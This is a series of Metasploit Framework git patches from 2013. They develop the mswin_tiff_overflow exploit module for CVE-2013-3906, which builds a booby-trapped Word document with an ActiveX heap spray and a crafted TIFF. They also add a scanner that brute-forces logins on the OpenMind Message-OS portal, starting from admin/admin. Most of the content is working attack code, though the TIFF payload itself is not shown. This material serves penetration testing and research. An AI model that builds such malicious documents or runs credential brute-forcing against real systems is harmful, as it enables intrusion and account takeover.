+    doc_xml                      = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
+    rels_xml                     = init_rels(doc_xml, doc_props)
 
     zip = Rex::Zip::Archive.new
     Dir["#{path}/**/**"].each do |file|
@@ -557,8 +594,11 @@ class Metasploit3 < Msf::Exploit::Remote
         print_status("Packing directory: #{p}")
         zip.add_file(p)
       else
-        print_status("Packing file: #{p}")
-        zip.add_file(p, read_file(file))
+        # Avoid packing image1.jpeg because we'll load it separately
+        if file !~ /media\/image1\.jpeg/
+          print_status("Packing file: #{p}")
+          zip.add_file(p, read_file(file))
+        end
       end
     end
 
@@ -583,6 +623,12 @@ class Metasploit3 < Msf::Exploit::Remote
     print_status("Packing file: #{tiff_file[:fname]}")
     zip.add_file(tiff_file[:fname], tiff_file[:data])
 
+    print_status("Packing file: #{doc_xml[:fname]}")
+    zip.add_file(doc_xml[:fname], doc_xml[:xml])
+
+    print_status("Packing file: #{rels_xml[:fname]}")
+    zip.add_file(rels_xml[:fname], rels_xml[:data])
+
     print_status("Packing file: #{doc_xml_reals_file[:fname]}")
     zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
 
@@ -590,7 +636,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-    @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
+    @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
     path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
     docx = make_docx(path)
     file_create(docx)

From 66edfe968d5b01a3bd8757b435a0b50ff74b0af9 Mon Sep 17 00:00:00 2001
From: corelanc0d3r <peter.ve@corelan.be>
Date: Thu, 21 Nov 2013 00:57:08 +0100
Subject: [PATCH 040/217] Sorting output

---
 lib/msf/base/simple/buffer.rb | 2 +-
 lib/msf/util/exe.rb           | 2 +-
 msfvenom                      | 6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index 35b4682f71..eae124d5aa 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -105,7 +105,7 @@ module Buffer
     'powershell','ps1',
     'vbscript',
     'vbapplication'
-    ]
+    ].sort
   end
 
 end
diff --git a/lib/msf/util/exe.rb b/lib/msf/util/exe.rb
index 3b0db149dd..091a40e2eb 100644
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1731,7 +1731,7 @@ def self.to_vba(framework,code,opts={})
     [
       'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe',
       'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac'
-    ]
+    ].sort
   end
 
   #
diff --git a/msfvenom b/msfvenom
index daa0d7d3ff..4d258fda18 100755
--- a/msfvenom
+++ b/msfvenom
@@ -147,9 +147,9 @@ class MsfVenom
     opt.on_tail('--help-formats', String, "List available formats") do
       init_framework(:module_types => [])
       msg = "Executable formats\n" +
-            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
+            "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.sort.join(", ") + "\n" +
             "Transform formats\n" +
-            "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
+            "\t" + ::Msf::Simple::Buffer.transform_formats.sort.join(", ")
       raise UsageError, msg
     end
 
@@ -507,4 +507,4 @@ if __FILE__ == $0
     $stderr.puts e.message
     exit(-1)
   end
-end
\ No newline at end of file
+end

From 9539972340159f610d4c6e1049b8ed20819bf2b6 Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Thu, 21 Nov 2013 06:33:05 +0300
Subject: [PATCH 041/217] Module for OpenMind Message-OS portal login

---
 .../scanner/http/openmind_messageos_login     | 116 ++++++++++++++++++
 1 file changed, 116 insertions(+)
 create mode 100644 modules/auxiliary/scanner/http/openmind_messageos_login

diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login b/modules/auxiliary/scanner/http/openmind_messageos_login
new file mode 100644
index 0000000000..240004692b
--- /dev/null
+++ b/modules/auxiliary/scanner/http/openmind_messageos_login
@@ -0,0 +1,116 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::AuthBrute
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'OpenMind Message-OS Portal Login Utility',
+      'Description'    => %{
+        This module scans for OpenMind Message-OS provisioning web login portal, and performs login brute force
+        to identify valid credentials.
+      },
+      'Author'         =>
+        [
+          'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
+        ],
+      'License'        => MSF_LICENSE
+
+    ))
+
+    register_options(
+      [
+        OptBool.new('SSL', [ false, "Negotiate SSL for outgoing connections", false]),
+        OptString.new('RPORT', [true, "Remote Port, default '8888'", "8888"]),
+        OptString.new('TARGETURI', [true, "URI for Web login. Default: /provision/index.php", "/provision/index.php"]),
+        OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admin'", "admin"]),
+        OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admin'", "admin"])
+      ], self.class)
+  end
+
+  def run_host(ip)
+    unless is_app_openmind?
+      return
+    end
+
+    print_status("#{peer} - Starting login brute force...")
+    each_user_pass do |user, pass|
+      do_login(user, pass)
+    end
+  end
+
+  #
+  # What's the point of running this module if the target actually isn't OpenMind
+  #
+
+  def is_app_openmind?
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => '/',
+        'method'    => 'GET'
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php"))
+      vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...")
+      return true
+    else
+      vprint_error("#{peer} - Application is not OpenMind. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Brute-force the login page
+  #
+
+  def do_login(user, pass)
+    vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+    begin
+      res = send_request_cgi(
+      {
+        'uri'       => target_uri.to_s,
+        'method'    => 'POST',
+        'vars_post' =>
+          {
+            'f_user' => user,
+            'f_pass' => pass
+          }
+      })
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+      vprint_error("#{peer} - HTTP Connection Failed...")
+      return :abort
+    end
+
+    if (res and res.code == 302 and res.headers['Location'].include?("frameset"))
+      print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
+      report_hash = {
+        :host   => rhost,
+        :port   => rport,
+        :sname  => 'OpenMind Message-OS Provisioning Portal',
+        :user   => user,
+        :pass   => pass,
+        :active => true,
+        :type => 'password'
+      }
+      report_auth_info(report_hash)
+      return :next_user
+    else
+      vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
+    end
+
+  end
+end

From b5011891a098f03f06e8c9f9da3da0d7a5ff9f0a Mon Sep 17 00:00:00 2001
From: Karn Ganeshen <KarnGaneshen@gmail.com>
Date: Thu, 21 Nov 2013 08:57:45 +0300
Subject: [PATCH 042/217] corrected rport syntax

---
 modules/auxiliary/scanner/http/openmind_messageos_login | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login b/modules/auxiliary/scanner/http/openmind_messageos_login
index 240004692b..495eb36b9f 100644
--- a/modules/auxiliary/scanner/http/openmind_messageos_login
+++ b/modules/auxiliary/scanner/http/openmind_messageos_login
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
     register_options(
       [
         OptBool.new('SSL', [ false, "Negotiate SSL for outgoing connections", false]),
-        OptString.new('RPORT', [true, "Remote Port, default '8888'", "8888"]),
+        Opt::RPORT(8888),
         OptString.new('TARGETURI', [true, "URI for Web login. Default: /provision/index.php", "/provision/index.php"]),
         OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admin'", "admin"]),
         OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admin'", "admin"])

From ddd5b0abb9477bd04fad00fa11f5ebbecbd74b1d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 21 Nov 2013 04:27:41 -0600
Subject: [PATCH 043/217] More progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 197 +++++++++++++-----
 1 file changed, 142 insertions(+), 55 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index bf41b04eb1..3cec000cc7 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -217,7 +217,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ax:classid'     => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
       'ax:license'     => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
       'ax:persistence' => "persistStorage",
-      'r:id'           => rid,
+      'r:id'           => "rId#{rid.to_s}",
       'xmlns:ax'       => "http://schemas.microsoft.com/office/2006/activeX",
       'xmlns:r'        => @schema
     }
@@ -242,7 +242,7 @@ class Metasploit3 < Msf::Exploit::Remote
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
     xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
-        xml.Relationship({:Id=>rid, :Type=>acx_type, :Target=>target_bin})
+        xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin})
     end
     end
 
@@ -260,7 +260,7 @@ class Metasploit3 < Msf::Exploit::Remote
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
     xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
       relationships.each do |r|
-        xml.Relationship({:Id=>r[:id], :Type=>r[:type], :Target=>r[:target]})
+        xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]})
       end
     end
     end
@@ -276,11 +276,20 @@ class Metasploit3 < Msf::Exploit::Remote
     rels = []
     rels << doc_xml
     rels << doc_props
+    rels = rels.flatten
+
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+      rels.each do |r|
+        xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')})
+      end
+    end
+    end
 
     {
       :fname => "_rels/.rels",
-      # The .rels generates the same format like make_doc_xml_reals, we'll just use that
-      :data  => make_doc_xml_reals(rels.flatten)
+      :data  => builder.to_xml
     }
   end
 
@@ -295,14 +304,14 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
     # Get all the required pre-defs
     chart_rids = []
-    pre_defs.select { |e| chart_rids << e[:rid] }
+    pre_defs.select { |e| chart_rids << e[:id] }
 
     # Get all the ActiveX RIDs
     ax_rids = []
-    activex.select { |e| ax_rids << e[:rid] }
+    activex.select { |e| ax_rids << e[:id] }
 
     # Get the TIFF RID
-    tiff_rid = tiff_file[:rid]
+    tiff_rid = tiff_file[:id]
 
 
     # Documentation on how this is crafted:
@@ -340,7 +349,7 @@ class Metasploit3 < Msf::Exploit::Remote
               xml.rPr do
                 xml.lang({'w:val' => "en-US"})
               end
-
+              
               # The "spray" is contained in these "run" elements
               xml.r do
               end
@@ -359,7 +368,7 @@ class Metasploit3 < Msf::Exploit::Remote
                   xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
                     #xml.extend({'cx'=>'1', 'cy'=>'1'})
                     xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
-                    xml.docPr({'id'=>'1', 'name' => "drawing 1"})
+                    xml.docPr({'id'=>'rId1', 'name' => "drawing 1"})
                     xml.cNvGraphicFramePr
                     xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
                       xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
@@ -373,16 +382,17 @@ class Metasploit3 < Msf::Exploit::Remote
           end
 
           # Paragraph (TIFF)
-
+          
         end
       end
     end
 
     {
-      :rid   => "rId#{last_rid.to_s}",
-      :type  => "#{@schema}/officeDocument",
-      :fname => "word/document.xml",
-      :xml   => builder.to_xml
+      :id           => (last_rid + 1).to_s,
+      :type         => "#{@schema}/officeDocument",
+      :fname        => "/word/document.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
+      :xml          => builder.to_xml
     }
   end
 
@@ -418,15 +428,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
-    xml.root({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
+    xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
       # Default extensions
       contenttypes.each do |contenttype|
-        xml.Override(contenttype)
+        xml.Default(contenttype)
       end
 
       # Additional overrides
       overrides.each do |override|
-        xml.Override({:PartName => override[:PartName], :ContentType => override[:ContentType]})
+        xml.Override({:PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType]})
       end
     end
     end
@@ -440,9 +450,19 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def init_doc_props(last_rid)
     items = []
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/extended-properties",
+      :fname        => "/docProps/app.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/core-properties",
+      :fname        => "/docProps/core.xml",
+      :content_type => "application/vnd.openxmlformats-package.core-properties+xml"
+    }
 
     return last_rid, items
   end
@@ -453,16 +473,82 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def init_doc_xml_rels_items(last_rid)
     items = []
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/styles",      :fname => "word/styles.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/settings",    :fname => "word/settings.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/theme",       :fname => "word/theme/theme1.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart1.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart2.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart3.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart4.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart5.xml"}
-    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart6.xml"}
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/styles",
+      :fname        => "/word/styles.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/settings",
+      :fname        => "/word/settings.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/webSettings",
+      :fname        => "/word/webSettings.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/fontTable",
+      :fname        => "/word/fontTable.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/theme",
+      :fname        => "/word/theme/theme1.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.theme+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart1.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart2.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart3.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart4.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart5.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
+
+    items << {
+      :id           => (last_rid += 1),
+      :type         => "#{@schema}/chart",
+      :fname        => "/word/charts/chart6.xml",
+      :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml"
+    }
 
     return last_rid, items
   end
@@ -475,30 +561,28 @@ class Metasploit3 < Msf::Exploit::Remote
     activex = []
 
     40.times do |i|
-      id       = last_rid + i
-      last_rid = id
-      rid      = "rId#{id.to_s}"
+      id = (last_rid += 1)
 
       bin  = {
-        :fname => "word/activeX/ActiveX#{id.to_s}.bin",
+        :fname => "/word/activeX/ActiveX#{id.to_s}.bin",
         :bin => make_activex_bin
       }
 
       xml  = {
-        :fname => "word/activeX/ActiveX#{id.to_s}.xml",
-        :xml => make_activex_xml(rid)
+        :fname => "/word/activeX/activeX#{id.to_s}.xml",
+        :xml => make_activex_xml(id)
       }
 
       rels = {
-        :fname => "word/activeX/_rels/activeX#{id.to_s}.xml.rels",
-        :rels => make_activex_xml_reals(rid, "activeX#{id.to_s}.bin")
+        :fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels",
+        :rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin")
       }
 
       ct   = "application/vnd.ms-office.activeX+xml"
       type = "#{@schema}/control"
 
       activex << {
-        :rid          => rid,
+        :id           => id,
         :bin          => bin,
         :xml          => xml,
         :rels         => rels,
@@ -516,10 +600,12 @@ class Metasploit3 < Msf::Exploit::Remote
   # :PartName     The path to an ActiveX XML file
   # :ContentType  The contenttype of the XML file
   #
-  def init_contenttype_xml_file(activex)
+  def init_contenttype_xml_file(*items)
     overrides = []
-    activex.each do |obj|
-      overrides << {:PartName => obj[:xml][:fname], :ContentType => obj[:content_type]}
+    items.each do |item|
+      item.each do |obj|
+        overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]}
+      end
     end
 
     {:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
@@ -530,14 +616,15 @@ class Metasploit3 < Msf::Exploit::Remote
   # Creates the tiff file
   #
   def init_tiff_file(last_rid)
+    id = last_rid + 1
     tiff_data = {
-      :rid   => "rId#{(last_rid += 1).to_s}",
-      :fname => "word/media/image1.jpeg",
+      :id   => id,
+      :fname => "/word/media/image1.jpeg",
       :data  => make_tiff,
       :type  => "#{@schema}/image"
     }
 
-    return last_rid, tiff_data
+    return id, tiff_data
   end
 
   #
@@ -546,16 +633,16 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_doc_xml_reals_file(pre_defs, activex, tiff)
     reals = []
     pre_defs.each do |obj|
-      reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
+      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')}
     end
 
     activex.each do |obj|
-      reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
+      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')}
     end
 
-    reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
+    reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')}
 
-    {:fname => "word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
+    {:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
   end
 
   #
@@ -576,14 +663,14 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def make_docx(path)
     print_status("Initializing files...")
-    last_rid = 1
-    last_rid, activex            = init_activex_files(last_rid)
+    last_rid = 0
     last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
-    ct_xml_file                  = init_contenttype_xml_file(activex)
-    last_rid, tiff_file          = init_tiff_file(last_rid)
+    last_rid, activex            = init_activex_files(last_rid)
     last_rid, doc_props          = init_doc_props(last_rid)
-    doc_xml_reals_file           = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
+    last_rid, tiff_file          = init_tiff_file(last_rid)
     doc_xml                      = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file)
+    ct_xml_file                  = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml])
+    doc_xml_reals_file           = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
     rels_xml                     = init_rels(doc_xml, doc_props)
 
     zip = Rex::Zip::Archive.new

From 56d1c545e73ce8078f397dd68356b8010105ced7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Thu, 21 Nov 2013 14:42:07 -0600
Subject: [PATCH 044/217] Oh look, more code

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 167 ++++++++++++++----
 1 file changed, 137 insertions(+), 30 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 3cec000cc7..dced5b74d0 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -294,6 +294,122 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
+  #
+  # Creates a run element for chart
+  # @param xml [Element]
+  # @param rid [String]
+  #
+  def create_chart_run_element(xml, rid)
+    drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
+
+    xml.r do
+      xml.rPr do
+        xml.noProof
+        xml.lang({'w:val' => "en-US"})
+      end
+
+      xml.drawing do
+        xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
+          #xml.extend({'cx'=>'1', 'cy'=>'1'})
+          xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
+          xml.docPr({'id'=>"rId#{rid.to_s}", 'name' => "drawing #{rid.to_s}"})
+          xml.cNvGraphicFramePr
+          xml['a'].graphic({'xmlns'=>"#{drawingml_schema}/main"}) do
+            xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do
+              xml['c'].chart({'xmlns:c'=>"#{drawingml_schema}/chart", 'xmlns:r'=>@schema})
+            end
+          end
+        end
+      end
+    end
+  end
+
+
+  #
+  # Creates a run element for ax
+  # @param xml [Element]
+  # @param rid [String]
+  #
+  def create_ax_run_element(xml, rid)
+    shape_attrs = {
+      'id'    => "_x0000_i10#{rid.to_s}",
+      'type'  => "#_x0000_t75",
+      'style' => "width:1pt;height:1pt",
+      'o:ole' => ""
+    }
+
+    control_attrs = {
+      'r:id'      => "rId#{rid.to_s}",
+      'w:name'    => "TabStrip#{rid.to_s}",
+      'w:shapeid' =>"_x0000_i10#{rid.to_s}"
+    }
+
+    xml.r do
+      xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do
+        xml['v'].shape(shape_attrs)
+        xml['w'].control(control_attrs)
+      end
+    end
+  end
+
+
+  #
+  # Creates a pic run element
+  # @param xml [Element]
+  # @param rid [String]
+  #
+  def create_pic_run_element(xml, rid)
+    drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006"
+
+    xml.r do
+      xml.rPr do
+        xml.noProof
+        xml.lang({'w:val'=>"en-US"})
+      end
+
+      xml.drawing do
+        xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
+          #xml.extend({'cx'=>'1', 'cy'=>'1'})
+          xml['wp'].effectExtend({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"})
+          xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"})
+          xml['wp'].cNvGraphicFramePr do
+            xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"})
+          end
+
+          xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do
+            xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do
+              xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do
+                xml['pic'].nvPicPr do
+                  xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"})
+                  xml['pic'].cNvPicPr
+                end
+
+                xml['pic'].blipFill do
+                  xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print")
+                  xml['a'].stretch do
+                    xml['a'].fillRect
+                  end
+                end
+
+                xml['pic'].spPr do
+                  xml['a'].xfrm do
+                    xml['a'].off({'x'=>"0", 'y'=>"0"})
+                    xml['a'].ext({'cx'=>"1", 'cy'=>"1"})
+                  end
+
+                  xml['a'].prstGeom({'prst' => "rect"}) do
+                    xml['a'].avLst
+                  end
+                end
+              end
+            end
+          end
+        end
+      end
+    end
+  end
+
+
   #
   # Creates a document.xml file
   # @param pre_defs [Array]
@@ -313,7 +429,6 @@ class Metasploit3 < Msf::Exploit::Remote
     # Get the TIFF RID
     tiff_rid = tiff_file[:id]
 
-
     # Documentation on how this is crafted:
     # http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
     doc_attrs = {
@@ -330,10 +445,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'xmlns:c'   => "http://schemas.openxmlformats.org/markup-compatibility/2006"
     }
 
-    p_attrs = {
-      'w:rsidR'        => "00F8254F",
-      'w:rsidRDefault' => "00D15BD0"
-    }
+    p_attrs = { 'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" }
 
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@@ -349,40 +461,25 @@ class Metasploit3 < Msf::Exploit::Remote
               xml.rPr do
                 xml.lang({'w:val' => "en-US"})
               end
-              
-              # The "spray" is contained in these "run" elements
-              xml.r do
+
+              ax_rids.each do |rid|
+                create_ax_run_element(xml, rid)
               end
             end
           end
 
-          # Paragraph (Charts)
+          # Charts
           xml.p(p_attrs) do
             xml.pPr do
-              xml.r do
-                xml.rPr do
-                  xml.noProof
-                  xml.lang({'w:val' => "en-US"})
-                end
-                xml.drawing do
-                  xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
-                    #xml.extend({'cx'=>'1', 'cy'=>'1'})
-                    xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
-                    xml.docPr({'id'=>'rId1', 'name' => "drawing 1"})
-                    xml.cNvGraphicFramePr
-                    xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
-                      xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
-                        xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>@schema})
-                      end
-                    end
-                  end
-                end
+              chart_rids.each do |rid|
+                create_chart_run_element(xml, rid)
               end
             end
+
+            # TIFF
+            create_pic_run_element(xml, tiff_rid)
           end
 
-          # Paragraph (TIFF)
-          
         end
       end
     end
@@ -436,7 +533,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
       # Additional overrides
       overrides.each do |override|
-        xml.Override({:PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType]})
+        override_attrs = {
+          :PartName    => override[:PartName] || override[:fname],
+          :ContentType => override[:ContentType]
+        }
+        xml.Override(override_attrs)
       end
     end
     end
